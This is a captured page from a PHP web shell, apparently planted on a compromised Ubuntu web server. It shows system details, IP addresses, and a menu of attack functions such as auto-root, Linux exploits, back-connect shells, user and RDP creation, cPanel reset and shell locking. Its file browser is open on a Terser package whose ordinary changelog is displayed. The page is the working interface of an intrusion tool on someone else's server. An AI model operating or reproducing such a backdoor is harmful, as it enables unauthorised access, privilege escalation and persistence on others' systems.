Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
terser /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
tools
[ DIR ]
drwxr-xr-x
CHANGELOG.md
1.23
KB
-rw-r--r--
LICENSE
1.32
KB
-rw-r--r--
PATRONS.md
86
B
-rw-r--r--
README.md
52.98
KB
-rw-r--r--
package.json
3.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CHANGELOG.md
# Changelog ## v3.17.0 - More DOM properties added to --mangle-properties's DOM property list - Closed issue where if 2 functions had the same argument name, Terser would not inline them together properly - Fixed issue with `hasOwnProperty.call` - You can now list files to minify in a Terser config file - Started replacing `new Array(<number>)` with an array literal - Started using ES6 capabilities like `Set` and the `includes` method for strings and arrays ## v3.16.1 - Fixed issue where Terser being imported with `import` would cause it not to work due to the `__esModule` property. (PR #254 was submitted, which was nice, but since it wasn't a pure commonJS approach I decided to go with my own solution) ## v3.16.0 - No longer leaves names like Array or Object or window as a SimpleStatement (statement which is just a single expression). - Add support for sections sourcemaps (IndexedSourceMapConsumer) - Drops node.js v4 and starts using commonJS - Is now built with rollup ## v3.15.0 - Inlined spread syntax (`[...[1, 2, 3], 4, 5] => [1, 2, 3, 4, 5]`) in arrays and objects. - Fixed typo in compressor warning - Fixed inline source map input bug - Fixed parsing of template literals with unnecessary escapes (Like `\\a`)
Close